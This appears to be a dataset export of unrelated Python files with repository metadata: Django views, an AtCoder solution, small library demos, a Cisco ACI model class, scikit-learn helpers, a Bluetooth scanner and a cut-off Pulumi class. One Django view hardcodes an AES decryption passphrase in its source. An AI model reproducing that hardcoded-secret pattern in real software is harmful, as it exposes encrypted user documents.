for anex_name in get_refpath:
anexture_name = anex_name['refpath']
print(anexture_name,'taff')
comments = commentsmodel(name=anexture_name,idprefix=idprefix,user_id=id)
commentsdb=comments.save()
Datadisp=commentsmodel.objects.filter(user_id=id,idprefix=idprefix).order_by('name')
print(Datadisp,'Datadisp')
# return render(request, 'applicant/view_all_doc.html',{'form':form,'details': taf,'idg':idg,'idprefix':idprefix})
# taa=TAapplicationmodel.objects.filter(user_id=id).first()
# taf=TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
# return render(request, 'dealing officer/detail view.html',{'taa':taa,'taf':taf,'id':id})
return render(request, 'rd/comments_view_doc.html',{'form':form,'details': Datadisp})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def addcomment(request):
anexture_name=request.POST['name']
comments=request.POST['comments']
responsible=request.POST['responsible']
status=request.POST['status']
idprefix=request.POST['idprefix']
print(idprefix,anexture_name,'idprefix')
print(comments,responsible,status,'details')
role=request.role
date_joined = datetime.now()
formatted_datetime = date_joined.strftime("%Y-%m-%d")
# get_cmd_id=commentsmodel.objects.filter(name=anexture_name,idprefix=idprefix).first()
# get_cmd_id.comments=comments
# get_cmd_id.commented_date=formatted_datetime
# get_cmd_id.commented_by=role
# get_cmd_id.save()
return render(request, 'rd/comments_view_doc.html')
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def pdfviewercopy(request,id):
# curr_path = "/"+str(id)+ "/TAapplication/"
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# with open(new_path+'TAapplication.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
taa=TAapplicationmodel.objects.filter(user_id=id).first()
taf=TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
print('kkkkkkkkkkkkkkkkk')
if request.POST:
aesurl=request.POST['path']
ext=request.POST['ext']
tafnew=TAapplicationfiles.objects.filter(user_id=id,filepath=aesurl,ext=ext).first()
fc=tafnew.comments
print('aesview',aesurl)
pdfurl=''
docurl=''
nameonly=''
if ext=='.pdf':
pdfurl = aesurl[:-3]+'pdf'
print('aesview',aesurl)
print('pdfview',pdfurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(pdfurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
print(pdfurl,'pdfurl')
pdfpath = pdfurl[25:]
print(pdfpath)
curr_path=pdfpath
url='http://127.0.0.1:8000/media'+curr_path
print(fc,'comments')
return render(request, 'dealing officer/detail view.html',{'url':url,'id':id,'fc':fc,'taa':taa,'taf':taf,'path':aesurl})
elif ext=='docx':
# word to pdf
nameonly=aesurl[:-4]
docurl = aesurl[:-4]+'.docx'
print('aesview',aesurl)
print('nameonly',nameonly)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
pythoncom.CoInitialize()
wdFormatPDF = 17
in_file = os.path.abspath(docurl)
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs(nameonly+'.pdf', FileFormat=wdFormatPDF)
doc.Close()
word.Quit()
pdfurl=nameonly+'.pdf'
print(pdfurl,'pdfurl')
pdfpath = pdfurl[25:]
print(pdfpath)
curr_path=pdfpath
url='http://127.0.0.1:8000/media'+curr_path
print(fc,'comments')
os.remove(docurl)
return render(request, 'dealing officer/detail view.html',{'url':url,'id':id,'fc':fc,'taa':taa,'taf':taf,'path':aesurl})
# with open(nameonly+'.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# finally:
# os.remove(nameonly+'.pdf')
# os.remove(docurl)
else:
return render(request, 'dealing officer/detail view.html',{'id':id,'taa':taa,'taf':taf})
# os.remove(pdfurl)
# print('asdfasdfasdfasdfasdfds')
| [
"[email protected]"
] | |
b03de72493e2c78c1000ad28f82b270dba2b5ebb | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /Others/soundhound/soundhound2018-summer-qual/c.py | b42363ae9f79c07d25224a6872610f1bc11e50c0 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 797 | py | # -*- coding: utf-8 -*-
def main():
n, m, d = map(int, input().split())
# KeyInsight
# 期待値の線形性
# See:
# https://img.atcoder.jp/soundhound2018-summer-qual/editorial.pdf
# https://mathtrain.jp/expectation
# 気がつけた点
# 愚直解を書き出した
# 隣り合う2項がm - 1通りある
# 解答までのギャップ
# dが0かどうかで場合分け
# 整数のペアを考える
ans = m - 1
if d == 0:
# d = 0: (1, 1), ..., (n, n)のn通り
ans /= n
else:
# d ≠ 0: (1, d + 1), ..., (n -d, n)と(d - 1, 1), ..., (n, n - d)で2 * (n - d)通り
ans *= 2 * (n - d)
ans /= n ** 2
print(ans)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
579b09ba8c6ea43f5b254fc7bfcff355538a029b | aa369073fab4f8e13ac27a714fe0d975a5a4a9ed | /algorithms/contextlib/contextlib_decorator.py | e31081404750566ee6b97aecadeb90d4fa43ebe0 | [] | no_license | ramsayleung/python3-module-of-week | 4076599a8b1d8aa5794de5d73e2083555abe9f0c | 54266c7e62025c3816a6987191c40f3bc0fdd97c | refs/heads/master | 2021-06-18T09:07:30.256614 | 2017-06-25T10:14:54 | 2017-06-25T10:14:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | import contextlib
class Context(contextlib.ContextDecorator):
def __init__(self, how_used):
self.how_used = how_used
print('__init__({})'.format(how_used))
def __enter__(self):
print('__enter__({})'.format(self.how_used))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
print('__exit__({})'.format(self.how_used))
@Context('as decorator')
def func(message):
print(message)
print()
with Context('as context manager'):
print('Doing work in the context')
print()
func('Doing work in the wrapped function')
| [
"[email protected]"
] | |
234dd1f7bc842aa839543c69dc1229e4cbfc4ef0 | 299e2c985b4a2921b150579955e7c60eee094397 | /news/migrations/0006_auto_20190628_1447.py | 9bd54a81c13dcf49ebf7819d2ee21928410fb2e4 | [
"MIT"
] | permissive | Nigar-mr/News | 48d58fbaab0f2bb8cc717323449d7eba14b94918 | b75b78cc9fa64259f4239b1d456daa5224040ce4 | refs/heads/master | 2020-06-17T15:20:05.411391 | 2019-07-09T08:21:24 | 2019-07-09T08:21:24 | 195,961,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | # Generated by Django 2.2.2 on 2019-06-28 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0005_remove_headermodel_dropdown'),
]
operations = [
migrations.AlterField(
model_name='headermodel',
name='image',
field=models.ImageField(upload_to='news/icons/'),
),
]
| [
"[email protected]"
] | |
4be510286a64309365e96715a1c1baddce168127 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/comp/accessp.py | 6214ab713e8f774ee7c5499f70f913487eac8f0d | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 5,062 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AccessP(Mo):
meta = ClassMeta("cobra.model.comp.AccessP")
meta.isAbstract = True
meta.moClassName = "compAccessP"
meta.moClassName = "compAccessP"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstraction of Access Profile"
meta.writeAccessMask = 0x11
meta.readAccessMask = 0x11
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.vmm.DomP")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.vmm.UsrAccP")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmOrchsProvPlan", "Provider Plans", "cobra.model.vmm.OrchsProvPlan"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ADomPToEthIf", "Interface", "cobra.model.l1.EthIf"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmEpPD", "Portgroups", "cobra.model.vmm.EpPD"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
9e03554339fbf11a977d749579273a5308ebe17c | 0ba1743e9f865a023f72a14d3a5c16b99ee7f138 | /problems/test_0413_dp.py | b94b4a4005613d47a4b97b5eda809a2ed0f42f15 | [
"Unlicense"
] | permissive | chrisxue815/leetcode_python | d0a38a4168243b0628256825581a6df1b673855c | a33eb7b833f6998972e5340d383443f3a2ee64e3 | refs/heads/main | 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | import unittest
import utils
# O(n^2) time. O(n) space. DP.
class Solution:
def numberOfArithmeticSlices(self, a):
"""
:type a: List[int]
:rtype: int
"""
# Common difference
dp = [0] * len(a)
result = 0
for p in range(len(a) - 1):
q = p + 1
dp[p] = a[q] - a[p]
for distance in range(2, len(a)):
for p in range(len(a) - distance):
q = p + distance
if dp[p] == a[q] - a[q - 1]:
result += 1
else:
dp[p] = None
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().numberOfArithmeticSlices(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
15779835a64dfa759bd9410bf9661ec5cf78f3aa | 9a1538123b8abec14410dad46c437cf735684dd9 | /product/migrations/0018_productproperty_value_type.py | 48a0a691e24e11ea5cedf4a2158c7c000f223fd6 | [] | no_license | asmuratbek/zastroy24 | deec6bd65229aeb29eb313d915c6c47ca036a8aa | d68ce21beefc644752a1271a4d8981cd2423afba | refs/heads/master | 2020-04-27T18:44:26.845151 | 2019-03-08T18:09:13 | 2019-03-08T18:09:13 | 174,585,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-24 09:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0017_auto_20171224_1536'),
]
operations = [
migrations.AddField(
model_name='productproperty',
name='value_type',
field=models.CharField(help_text='\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0433', max_length=255, null=True, verbose_name='\u0415\u0434\u0438\u043d\u0438\u0446\u0430 \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f'),
),
]
| [
"[email protected]"
] | |
7ea4348e0388b427adcc0d1d2c31b06df0550e19 | 023acc1445ebde3e9fe4318fcfd60908c91d74d5 | /sli/train.py | 77fdce51b077a71a4dc73a1c298f924c963fc9d0 | [] | no_license | counterfactuals/sensible-local-interpretations | 99d22df59a6f07b6135762eec57c29e80dac9cdf | ab7af07299ea2ec1a1be28e0bf38f4947321d04c | refs/heads/master | 2022-03-12T11:30:19.296104 | 2019-12-02T20:31:27 | 2019-12-02T20:31:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | from copy import deepcopy
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, GradientBoostingClassifier
from sklearn.tree import export_graphviz, DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.tree import plot_tree
from sampling import resample
def train_models(X: np.ndarray, y: np.ndarray,
class_weights: list=[0.5, 1.0, 2.0], model_type: str='logistic'):
'''
Params
------
class_weights
Weights to weight the positive class, one for each model to be trained
'''
assert np.unique(y).size == 2, 'Task must be binary classification!'
models = []
for class_weight in class_weights:
if model_type == 'logistic':
m = LogisticRegression(solver='lbfgs', class_weight={0: 1, 1: class_weight})
elif model_type == 'mlp2':
m = MLPClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
elif model_type == 'rf':
m = RandomForestClassifier(class_weight={0: 1, 1: class_weight})
elif model_type == 'gb':
m = GradientBoostingClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
m.fit(X, y)
models.append(deepcopy(m))
return models
def regress(X: np.ndarray, y: np.ndarray, model_type: str='linear'):
if model_type == 'linear':
m = LinearRegression()
elif model_type == 'mlp2':
m = MLPRegressor()
elif model_type == 'rf':
m = RandomForestRegressor()
elif model_type == 'gb':
m = GradientBoostingRegressor()
m.fit(X, y)
return m
| [
"[email protected]"
] | |
cc2b9367dcb75a3613b7456a24d7379ffed94e1f | 23daf97312ea16cc399feedfa048131d564b83fa | /lib/BluenetLib/lib/core/bluetooth_delegates/AioScanner.py | 1bdc096e712664a077ca209d4d5155cfeaf19041 | [] | no_license | wickyb94/programmer | 6e2cafa3fbb9f54bfdcd24f7062f6425ebb429fc | be0f01586365a79b51af8c4da376fe216d38afba | refs/heads/master | 2022-04-09T17:52:18.106331 | 2020-03-02T15:57:02 | 2020-03-02T15:57:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,569 | py | import asyncio
import sys
import time
import aioblescan
from BluenetLib.lib.util.LogUtil import tfs
counter = 0
prev = time.time()
start = time.time()
class AioScanner:
def __init__(self, hciIndex = 0):
self.event_loop = None
self.bluetoothControl = None
self.connection = None
self.timeRequestStart = 0
self.eventReceived = False
self.hciIndex = hciIndex
self.delegate = None
self.scanRunning = False
self.scanDuration = 0
def withDelegate(self, delegate):
self.delegate = delegate
return self
def start(self, duration):
self.scanRunning = True
self.scanDuration = duration
self.scan()
def stop(self):
self.scanRunning = False
def scan(self, attempt = 0):
print(tfs(), "Attempt Scanning")
self.eventReceived = False
event_loop = asyncio.new_event_loop()
bluetoothSocket = aioblescan.create_bt_socket(self.hciIndex)
transportProcess = event_loop._create_connection_transport(bluetoothSocket, aioblescan.BLEScanRequester, None, None)
self.connection, self.bluetoothControl = event_loop.run_until_complete(transportProcess)
print(tfs(), "Connection made!")
self.bluetoothControl.process = self.parsingProcess
self.timeRequestStart = time.time()
self.bluetoothControl.send_scan_request()
print(tfs(), "Scan command sent!")
alreadyCleanedUp = False
try:
event_loop.run_until_complete(self.awaitEventSleep(1))
if not self.eventReceived:
if attempt < 10:
print(tfs(), 'Retrying... Closing event loop', attempt)
self.cleanup(event_loop)
alreadyCleanedUp = True
self.scan(attempt + 1)
return
else:
pass
event_loop.run_until_complete(self.awaitActiveSleep(self.scanDuration))
except KeyboardInterrupt:
print('keyboard interrupt')
finally:
print("")
if not alreadyCleanedUp:
print(tfs(), 'closing event loop', attempt)
self.cleanup(event_loop)
async def awaitEventSleep(self, duration):
while self.eventReceived == False and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
async def awaitActiveSleep(self, duration):
while self.scanRunning == True and duration > 0:
await asyncio.sleep(0.05)
duration -= 0.05
def cleanup(self, event_loop):
print(tfs(), "Cleaning up")
self.bluetoothControl.stop_scan_request()
self.connection.close()
event_loop.close()
def parsingProcess(self, data):
ev=aioblescan.HCI_Event()
xx=ev.decode(data)
hasAdvertisement = self.dataParser(ev)
if hasAdvertisement and self.delegate is not None:
self.delegate.handleDiscovery(ev)
def dataParser(self, data):
#parse Data required for the scanner
advertisementReceived = False
for d in data.payload:
if isinstance(d, aioblescan.aioblescan.HCI_CC_Event):
self.checkHCI_CC_EVENT(d)
elif isinstance(d, aioblescan.Adv_Data):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.HCI_LE_Meta_Event):
advertisementReceived = self.dataParser(d) or advertisementReceived
elif isinstance(d, aioblescan.aioblescan.HCI_LEM_Adv_Report):
self.eventReceived = True
advertisementReceived = True
return advertisementReceived
def checkHCI_CC_EVENT(self, event):
for d in event.payload:
if isinstance(d, aioblescan.aioblescan.OgfOcf):
if d.ocf == b'\x0b':
print(tfs(),"Settings received")
elif d.ocf == b'\x0c':
print(tfs(), "Scan command received")
# if isinstance(d, aioblescan.aioblescan.Itself):
# print("byte", d.name)
# if isinstance(d, aioblescan.aioblescan.UIntByte):
# print("UIntByte", d.val)
def parseAdvertisement(self, decodedHciEvent):
global counter
if counter % 50 == 0:
counter = 0
print(".")
else:
sys.stdout.write(".")
counter+= 1
# decodedHciEvent.show()
| [
"[email protected]"
] | |
96fd2bd857643c663092d384cf8ec78d6b61a6cf | fb0f6646b2a7972454453907fbdc656b7471f55f | /p322_module_os.py | dd9437674eb42016e5d93c9c80fd0ac56ab764e7 | [] | no_license | woojin97318/python_basic | 6497d5c85369746edfe8ca79ad7f3f47c871ee66 | 97e9a322a08f1483bf35dc03507ac36af2bf1ddb | refs/heads/master | 2023-07-15T03:06:05.716623 | 2021-08-25T03:46:48 | 2021-08-25T03:46:48 | 399,681,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # 모듈을 읽어 들입니다.
import os
# 기본 정보를 몇개 출력해 봅시다.
print("현재 운영체제:", os.name)
print("현재 폴더:", os.getcwd())
print("현재 폴더 내부의 요소:", os.listdir())
# 폴더를 만들고 제거합니다.[폴더가 비어있을 때만 제거 가능]
os.mkdir("hello")
os.rmdir("hello")
# 파일을 생성하고 + 파일 이름을 변경합니다.
with open("original.txt", "w") as file:
file.write("hello")
os.rename("original.txt", "new.txt")
# 파일을 제거합니다.
os.remove("new.txt")
# os.unlink("new.txt")
# 시스템 명령어
os.system("dir") | [
"[email protected]"
] | |
44b780296f882a1446213f64764a325db1448200 | 850001831b1fcdd4d27e328b356fc34909ca2917 | /examples/spawn.py | 367e288dfa2b65a8b6bb4a47c0514b8b5cd14e4f | [
"BSD-3-Clause"
] | permissive | yidiq7/pathos | b337353ccfe447866c46a4a784a7908c2f3fe31e | 7e4fef911dc0283e245189df4683eea65bfd90f0 | refs/heads/master | 2022-08-24T08:43:34.009115 | 2020-05-27T12:18:21 | 2020-05-27T12:18:21 | 267,310,390 | 0 | 0 | NOASSERTION | 2020-05-27T12:14:50 | 2020-05-27T12:14:47 | null | UTF-8 | Python | false | false | 957 | py | #!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2020 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/pathos/blob/master/LICENSE
"""
demonstrate pathos's spawn2 function
"""
from __future__ import print_function
from pathos.util import spawn2, _b, _str
if __name__ == '__main__':
import os
def onParent(pid, fromchild, tochild):
s = _str(fromchild.readline())
print(s, end='')
tochild.write(_b('hello son\n'))
tochild.flush()
os.wait()
def onChild(pid, fromparent, toparent):
toparent.write(_b('hello dad\n'))
toparent.flush()
s = _str(fromparent.readline())
print(s, end='')
os._exit(0)
spawn2(onParent, onChild)
# End of file
| [
"mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df"
] | mmckerns@8bfda07e-5b16-0410-ab1d-fd04ec2748df |
6da151561ebdbcbd2e1ef59f98ad58c5ba0e4fdd | 9b1da04d8c66b8fb429120c902e4022506a05f5a | /apc_pcl/pysrc/apc_tools/__init__.py | a4d7113fa1bb4ff799cd3927888c039cacc468a9 | [] | no_license | ehuang3/apc_ros | 49533b7c6ec9a13d45914b0c252c88c7413731a7 | 050871ec3e85c53fe1b0e4612abbbfa07db75f59 | refs/heads/master | 2021-01-10T12:30:49.700225 | 2015-05-27T03:41:20 | 2015-05-27T03:41:20 | 36,998,288 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from .bin_segmenter import Bin_Segmenter
from .utils import *
from .misc import load_background | [
"[email protected]"
] | |
daa82ba337e7c7ea48f602e231247e8415e0c3dc | 805fbd9aead4fc2998fd5d8790043a20b2656915 | /data_format/__init__.py | cb3c33b9d09bcf03a38af8f8bdd84bd066689fa1 | [] | no_license | chenhaomingbob/ToolBox | f9a6ef64352c85ae84c44e9fab53aab74992c7c5 | 962304c004aa39e8a5bcb153def9dc3895595c9f | refs/heads/master | 2021-05-19T00:37:23.170766 | 2020-06-01T10:57:05 | 2020-06-01T10:57:05 | 251,496,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
"""
Author: Haoming Chen
E-mail: [email protected]
Time: 2020/03/23
Description:
""" | [
"[email protected]"
] | |
d3743b3de00d52481bf2c74a20fb31405afce4c4 | fb81442e5d2e940ad967bd0a264b7918d739173f | /py_test.py | 49e8b365b34d93965925230a57e83abad11d1008 | [] | no_license | Amertz08/euler_py | 054f45d110b8cf4d0e9afeb7f5c608026226443c | 0dd217c9e0a061e3622fd150b61e24a2c6bad5af | refs/heads/master | 2021-05-06T23:15:42.742578 | 2017-12-07T00:16:31 | 2017-12-07T00:16:31 | 112,960,695 | 0 | 1 | null | 2017-12-06T20:32:57 | 2017-12-03T20:21:48 | C | UTF-8 | Python | false | false | 515 | py | import euler_py as eul
def test_problem_one():
result = eul.problem_one(10)
assert result == 23, f'Problem 1 should be 23: {result}'
def test_problem_two():
result = eul.problem_two(89)
assert result == 44, f'Problem 2 should be 44: {result}'
def test_problem_three():
result = eul.problem_three(13195)
assert result == 29, f'Problem 3 should be 29: {result}'
def test_problem_four():
result = eul.problem_four(2)
assert result == 9009, f'Problem 4 should be 9009: {result}'
| [
"[email protected]"
] | |
516373953da84479aba9b11e0bae3dbf7d26ccf5 | bb41814dc79f56a082a777e17ed31320db43edf4 | /reinforcement_learning/0x00-q_learning/4-play.py | d6b4d54e98814a6ad8799721a6031a8177cbde91 | [] | no_license | garimasinghgryffindor/holbertonschool-machine_learning | a92c619b6ad2d110ed97b33fa9903f5134c96866 | 856ee36006c2ff656877d592c2ddb7c941d63780 | refs/heads/master | 2023-08-01T09:58:13.863062 | 2020-11-28T00:50:55 | 2020-11-28T00:50:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | #!/usr/bin/env python3
"""
Has the trained agent play an episode
"""
import numpy as np
def play(env, Q, max_steps=100):
"""
Has the trained agent play an episode
:param env: is the FrozenLakeEnv instance
:param Q: is a numpy.ndarray containing the Q-table
:param max_steps: is the maximum number of steps in the episode
:return: the total rewards for the episode
"""
state = env.reset()
env.render()
for step in range(max_steps):
action = np.argmax(Q[state])
new_state, reward, done, info = env.step(action)
env.render()
if done:
return reward
state = new_state
env.close()
| [
"[email protected]"
] | |
538609c419c2927cdc8dfadedbe9bd4adf2e7c9f | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/datashare/v20201001preview/data_set_mapping.py | e00a71eae41a251fe545b0c3ef3d7cbfc785120d | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 12,170 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['DataSetMappingArgs', 'DataSetMapping']
@pulumi.input_type
class DataSetMappingArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
kind: pulumi.Input[Union[str, 'DataSetMappingKind']],
resource_group_name: pulumi.Input[str],
share_subscription_name: pulumi.Input[str],
data_set_mapping_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DataSetMapping resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "kind", kind)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_subscription_name", share_subscription_name)
if data_set_mapping_name is not None:
pulumi.set(__self__, "data_set_mapping_name", data_set_mapping_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the share account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
